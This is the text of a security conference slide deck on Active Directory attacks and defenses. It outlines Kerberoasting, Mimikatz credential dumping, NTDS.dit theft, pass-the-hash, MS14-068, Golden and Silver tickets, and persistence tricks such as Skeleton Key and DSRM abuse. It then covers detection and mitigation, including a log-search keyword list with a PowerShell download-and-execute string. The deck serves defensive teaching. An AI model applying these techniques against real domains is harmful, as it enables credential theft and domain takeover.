Red vs.

Blue:
Modern Active Directory
Attacks & Defense

Sean Metcalf
CTO
DAn Solutions
sean [@] dansolutions . com
http://DAnSolutions.com
http://www.ADSecurity.org
Photo by Ed Speir IV.
All Rights Reserved. Used with Permission.
ABOUT
Chief Technology Officer - DAn Solutions
Microsoft Certified Master (MCM) Directory Services
Security Researcher / Purple Team
Security Info -> ADSecurity.org
AGENDA

Red Team (Recon, Escalate, Persist)

Blue Team (Detect, Mitigate, Prevent)
Kerberos TGT Ticket
Kerberos Overview
Kerberos Key Points
NTLM password used for Kerberos RC4 encryption.
Logon Ticket (TGT) proves prior user auth to DC.
Kerberos policy only checked at TGT creation
DC only validates user account when TGT > 20 mins.
Service Ticket (TGS) PAC validation is optional & rare.
Red Team (Offense)
“SPN Scanning” Service Discovery
SQL servers, instances, ports, etc.
MSSQLSvc/adsmsSQLAP01.adsecurity.org:1433
Exchange Client Access Servers
exchangeMDB/adsmsEXCAS01.adsecurity.org
RDP
TERMSERV/adsmsEXCAS01.adsecurity.org
Going from N/A to DA (Domain Admin)

Poor Service Account Passwords

Passwords in SYSVOL
Credential Theft
Misconfiguration / Incorrect Perms
Exploit Vulnerability
SPN Scanning for Service Accounts with Find-PSServiceAccounts

SPN Directory:
http://adsecurity.org/?page_id=183
Cracking Service Account Passwords (Kerberoast)

Request/Save TGS service tickets & crack offline.

“Kerberoast” python-based TGS password cracker.
No elevated rights required.
No traffic sent to target.
Kerberoast: Request TGS Service Ticket
Kerberoast: Save & Crack TGS Service Ticket
Exploiting Group Policy Preferences
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
Mimikatz: The Credential Multi-tool
Dump credentials
Windows protected memory (LSASS). *
Active Directory Domain Controller database . *
Dump Kerberos tickets
for all users. *
for current user.
Credential Injection
Password hash (pass-the-hash)
Kerberos ticket (pass-the-ticket)
Generate Silver and/or Golden tickets
And so much more!
Dump Credentials with Mimikatz
User Service Account
Dumping AD Domain Credentials
Dump credentials on DC (local or remote).
Run Mimikatz (WCE, etc) on DC.
Invoke-Mimikatz on DC via PS Remoting.
Get access to the NTDS.dit file & extract data.
Copy AD database from remote DC.
Grab AD database copy from backup.
Get Virtual DC data.
Dump AD Credentials with Mimikatz
Dump LSASS Process Memory
Remotely Grab the DIT!
Instead of VSS, why not leverage NTDSUtil?
Finding NTDS.dit on the Network
Are your DC backups properly secured?
Who administers the virtual server hosting the DCs?
Are your VMWare/Hyper-V host admins considered
Domain Admins?

Hint: They should be.

Dump Password Hashes from NTDS.dit
Pass The… Credential
Pass the Hash
Pass the Ticket
Over Pass the Hash
Over Pass the Hash
MS14-068: (Microsoft) Kerberos Vulnerability

MS14-068 (CVE-2014-6324) Patch released 11/18/2014

Domain Controller Kerberos Service (KDC) didn’t correctly validate the PAC
checksum.
Effectively re-write user ticket to be a Domain Admin.
Own AD in 5 minutes

http://adsecurity.org/?tag=ms14068
MS14-068 (PyKEK 12/5/2014)
MS14-068 Kekeo Exploit
MS14-068 Kekeo Exploit – Packet Capture
User to Admin in 5 Minutes?
Sneaky AD Persistence Tricks
(Attacker has DA access for 5 minutes)

DSRM Local Policy

SSP Logon Scripts
Group Policy
Skeleton Key
Scheduled Tasks
SID History WMI
Kerberos Ticket Forging Output | SYSVOL
DSRM? What’s DSRM?

•Directory Services Restore Mode

•“Break glass” access to DC
•DSRM password set when DC is promoted
•Rarely changed.
DSRM = DC Local Administrator Account
Using DSRM Creds
•Reboot to DSRM
•Access DSRM without Rebooting (2k8+)
•DsrmAdminLogonBehavior = 1
•Stop Active Directory (ntds) service
•Console logon (not RDP)
Using DSRM Creds

•Access DSRM without Rebooting (2k8+)

• DsrmAdminLogonBehavior = 2
• Stop Active Directory (ntds) service
• Console logon (not RDP)
Using DSRM Creds Over the Network
• Console logon
• VMWare Remote Console
• (TCP 903)
• Hyper-V VM Connection
• (TCP 5900)
• Network KVM
Malicious Security Service Provider (SSP)
• Mimikatz supports registry & in-memory updating
Malicious Security Service Provider (SSP)
Malicious Security Service Provider (SSP)
Malicious Security Service Provider (SSP)
Malicious Security Service Provider (SSP)
 Skeleton Key
• Memory resident LSASS patch - “master key” for all accounts
 Skeleton Key
• Account authentication success! With 2 different passwords?
 SID History
• User account attribute supporting migration.
• Mimikatz enables SID History injection to any user account.
SID History
SID History -> Domain Exploitation
Forging Kerberos Golden/Silver Tickets
Requires KRBTGT pw hash / service account pw hash.
Forged TGT (Golden Ticket) bypasses all user restrictions.
Create anywhere & use from any computer on the network.
No elevated rights required to create/use.
User password changes have no impact on forged ticket!
KRBTGT: The Kerberos Service Account
KRBTGT account: disabled and hidden by default.
Sign/encrypt AD Kerberos tickets.
Pwd set when domain created & (almost) never changes
Password changes when DFL -> 2008 (or newer).
Current & Previous Password valid for Kerberos tickets
KRBTGT password exposed? Requires changing twice!
Microsoft KRBTGT password change script on TechNet
RODC Kerberos Account: KRBTGT_######.
KRBTGT: The Kerberos Service Account
The Golden Ticket (Forged TGT)
Encrypted/Signed by KRBTGT (RID 502).
Bypasses Smart Card authentication requirement
Golden Ticket options:
Impersonate existing Domain Admin
Create Fictitious user
Spoof access by adding groups to the ticket
Impersonate C-level executive access
Limited to Domain it’s created in *
Where are the crown jewels?
Golden Ticket (Forged TGT) Communication
Forging a Golden Ticket: KRBTGT NTLM Hash
Golden Ticket Limitation
Admin rights limited to current domain.
Doesn’t work across trusts unless in EA domain.
Golden Ticket – Now More GOLDEN!
Mimikatz now supports SID History in Golden Tickets
The Silver Ticket (Forged TGS)
Service account configured for Kerberos auth (SPN).
Encrypted with the service account private key:
Service account NLTM password hash
AD computer account NLTM password hash
Service opens TGS ticket to validate.
Golden Ticket equivalent access to service.
No associated TGT exists, so no comm with a DC
Silver Ticket (Forged TGS) Communication
Silver Ticket: Domain Controller Exploitation

• Attacker dumped AD & has all domain creds.

• Corp IT changed all user, admin, and service account passwords
(and KRBTGT pw 2x).
• Attacker still has Domain Controller computer account password
hashes.

What is possible with these?

Silver Ticket: Domain Controller Exploitation
Silver Ticket: Domain Controller Exploitation
Silver Ticket: Domain Controller Exploitation
Silver Ticket: Domain Controller Exploitation
Silver Ticket: Domain Controller Exploitation
Silver Ticket: Domain Controller Exploitation

Gain access to a Domain Controller’s AD computer account password.

Generate Silver Ticket for CIFS SPN to access file system via default shares.
Generate Silver Ticket for HOST SPN to create scheduled task to run as local
System (and re-exploit the domain).

HOST = alerter,appmgmt,cisvc,clipsrv,browser,dhcp,dnscache,replicator,eventlog,eventsystem,
policyagent,oakley,dmserver,dns,mcsvc,fax,msiserver,ias,messenger,netlogon,netman,
netdde,netddedsm,nmagent,plugplay,protectedstorage,rasman,rpclocator,rpc,rpcss,
remoteaccess,rsvp,samss,scardsvr,scesrv,seclogon,scm,dcom,cifs,spooler,snmp,schedule,
tapisrv,trksvr,trkwks,ups,time,wins,www,http,w3svc,iisadmin,msdtc
Blue Team (Defense)
Detecting MS14-068 On the Wire
AS-REQ TGS-REQ
Detecting Forged Kerberos
Golden (TGT) & Silver (TGS) Tickets
• Normal, valid account logon event data structure:
• Security ID: DOMAIN\AccountID
• Account Name: AccountID
• Account Domain: DOMAIN
• Golden & Silver Ticket events may have one of these
issues:
• The Account Domain field is blank when it should contain
DOMAIN.
• The Account Domain field is DOMAIN FQDN when it should
contain DOMAIN.
• The Account Domain field contains “eo.oe.kiwi :)“
Detecting MS14-068 Exploit Security Events
• Normal, valid account logon event data structure:
• Security ID: DOMAIN\AccountID
• Account Name: AccountID
• Account Domain: DOMAIN

• MS14-068 Exploit events may have 1 (or more) of these:

• The Account Domain field is blank when it should be
DOMAIN
• The Account Domain field is DOMAIN FQDN when it should
be DOMAIN.
• Account Name is a different account from the Security ID.
AD Attack Mitigation: PowerShell Security
• Limit PowerShell Remoting (WinRM).
• Limit WinRM listener scope to admin subnets.
• Disable PowerShell Remoting (WinRM) on DCs.
• Audit/block PowerShell script execution via AppLocker.
• PowerShell v3+: Enable PowerShell Module logging (via GPO).
• Search PowerShell logs for “mimikatz”, “gentilkiwi”, “Delpy”,
“iex (new-object net.webclient).downloadstring”, etc
• Leverage Metering for PowerShell usage trend analysis.
• JoeUser ran PowerShell on 10 computers today?
• Track PowerShell Remoting Usage
PowerShell v5 Security Enhancements

•System-wide transcripts
•Script block logging
•Constrained PowerShell
•Antimalware Integration (Win 10)
Mitigation Level One (Low)
• Minimize the groups (& users) with DC admin/logon rights
• Separate user & admin accounts (JoeUser & AdminJoeUser)
• No user accounts in admin groups
• Set all admin accounts to “sensitive & cannot be delegated”
• Deploy Security Back-port patch (KB2871997) which adds local
SIDs & enable regkey to prevent clear-text pw in LSASS.
• Set GPO to prevent local accounts from connecting over network
to computers (easy with KB2871997).
• Use long, complex (>25 characters) passwords for SAs.
• Delete (or secure) GPP policies and files with creds.
• Patch server image (and servers) before running DCPromo
• Implement RDP Restricted Admin mode
Mitigation Level Two (Moderate)
• Microsoft LAPS (or similar) to randomize computer local admin
account passwords.
• Service Accounts (SAs):
• Leverage “(Group) Managed Service Accounts”.
• Implement Fine-Grained Password Policies (DFL >2008).
• Limit SAs to systems of the same security level, not shared
between workstations & servers (for example).
• Remove Windows 2003 from the network.
• Separate Admin workstations for administrators (locked-
down & no internet).
• PowerShell logging
 Mitigation Level Three (“It’s Complicated”)
• Number of Domain Admins = 0
• Complete separation of administration New Admin Model
• ADAs use SmartCard auth w/ rotating pw
• ADAs never logon to other security tiers.
• ADAs should only logon to a DC
(or admin workstation or server).
• Time-based, temporary group membership.
• No Domain Admin service accounts running on
non-DCs.
• Disable default local admin account & delete all
other local accounts.
• Implement network segmentation.
• CMD Process logging & enhancement (KB3004375).
 Attack Detection Paradigm Shift
• Microsoft Advanced Threat Analytics (ATA, formerly Aorato)
• Monitors all network traffic to Domain Controllers
• Baselines “normal activity” for each user (computers, resources, etc)
• Alerts on suspicious activity by user
• Natively detects recon & attack activity without writing rules

• ATA Detection Capability:

• Credential theft & use: Pass the hash, Pass the ticket, Over-Pass the hash, etc
• MS14-068 exploits
• Golden Ticket usage
• DNS Reconnaissance
• Password brute forcing
• Domain Controller Skeleton Key Malware
Microsoft ATA Suspicious Activity
Credential Theft Protection (Future)
Additional Mitigations
• Monitor scheduled tasks on sensitive systems (DCs, etc)
• Block internet access to DCs & servers.
• Monitor security event logs on all servers for known forged
Kerberos & backup events.
• Include computer account password changes as part of
domain-wide password change scenario (breach recovery).
• Change the KRBTGT account password (twice) every year &
when an AD admin leaves.
• Incorporate Threat Intelligence in your process and model
defenses against real, current threats.
Summary
• Attackers will get code running on a target network.
• The extent of attacker access is based on defensive posture.
• Advanced attacks may be detectable. Though it’s better to
prevent this type of access in the first place.
• Protect AD Admins or a full domain compromise is likely!

My research into AD attack, defense, & detection is ongoing. This

is only the beginning…
Thanks!
• Alva “Skip” Duckwall (@passingthehash)
• http://passing-the-hash.blogspot.com
• Many others in the security community!
• Benjamin Delpy (@gentilkiwi)
• http://blog.gentilkiwi.com/mimikatz
• Chris Campbell (@obscuresec)
• My wife & family for putting up with me
• http://obscuresecurity.blogspot.com
being on the computer every night!
• Joe Bialek (@clymb3r)
• https://clymb3r.wordpress.com
• Matt Graeber (@mattifestation)
• http://www.exploit-monday.com CONTACT:
Sean Metcalf
• Rob Fuller (@mubix) @PyroTek3
• http://www.room362.com sean [@] dansolutions . com
• Will Schroeder (@harmj0y) http://DAnSolutions.com
https://www.ADSecurity.org
• http://blog.harmj0y.net
References
• Skip Duckwall & Benjamin Delpy’s Blackhat USA 2014 presentation “Abusing Microsoft Kerberos
– Sorry Guys You Still Don’t Get It” http://www.slideshare.net/gentilkiwi/abusing-microsoft-
kerberos-sorry-you-guys-dont-get-it
• Tim Medin’s DerbyCon 2014 presentation: “Attacking Microsoft Kerberos: Kicking the Guard
Dog of Hades”
https://www.youtube.com/watch?v=PUyhlN-E5MU
• TechEd North America 2014 Presentation: TWC: Pass-the-Hash and Credential Theft Mitigation
Architectures (DCIM-B213) Speakers: Nicholas DiCola, Mark Simos
http://channel9.msdn.com/Events/TechEd/NorthAmerica/2014/DCIM-B213
• Chris Campbell - GPP Password Retrieval with PowerShell
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
• Protection from Kerberos Golden Ticket - Mitigating pass the ticket on Active Directory
CERT-EU Security White Paper 2014-07
http://cert.europa.eu/static/WhitePapers/CERT-EU-
SWP_14_07_PassTheGolden_Ticket_v1_1.pdf
• An overview of KB2871997
http://blogs.technet.com/b/srd/archive/2014/06/05/an-overview-of-kb2871997.aspx
• Microsoft security advisory: Update to improve Windows command-line auditing: (2/10/2015)
http://support.microsoft.com/en-us/kb/3004375
References
• Kerberos, Active Directory’s Secret Decoder Ring
http://adsecurity.org/?p=227
• Kerberos & KRBTGT: Active Directory’s Domain Kerberos Account
http://adsecurity.org/?p=483
• PowerShell Code: Check KRBTGT Domain Kerberos Account Last Password Change
http://adsecurity.org/?p=481
• Mimikatz and Active Directory Kerberos Attacks http://adsecurity.org/?p=556
• Mining Active Directory Service Principal Names
http://adsecurity.org/?p=230
• MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege
http://adsecurity.org/?tag=ms14068
• Microsoft Enhanced security patch KB2871997
http://adsecurity.org/?p=559
• SPN Directory:
http://adsecurity.org/?page_id=183
• PowerShell Code: Find-PSServiceAccounts
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-
PSServiceAccounts
References
• DEF CON 22 - Ryan Kazanciyan and Matt Hastings, Investigating PowerShell Attacks
https://www.youtube.com/watch?v=qF06PFcezLs
• Mandiant 2015 Threat Report
https://www2.fireeye.com/WEB-2015RPTM-Trends.html
• PowerSploit: https://github.com/mattifestation/PowerSploit
• PowerView:
https://github.com/Veil-Framework/PowerTools/tree/master/PowerView
• PoshSec: https://github.com/PoshSec
• Microsoft Kerberos PAC Validation
http://blogs.msdn.com/b/openspecification/archive/2009/04/24/understanding-
microsoft-kerberos-pac-validation.aspx
• "Admin Free" Active Directory and Windows, Part 1 & 2
http://blogs.technet.com/b/lrobins/archive/2011/06/23/quot-admin-free-quot-active-
directory-and-windows-part-1-understanding-privileged-groups-in-ad.aspx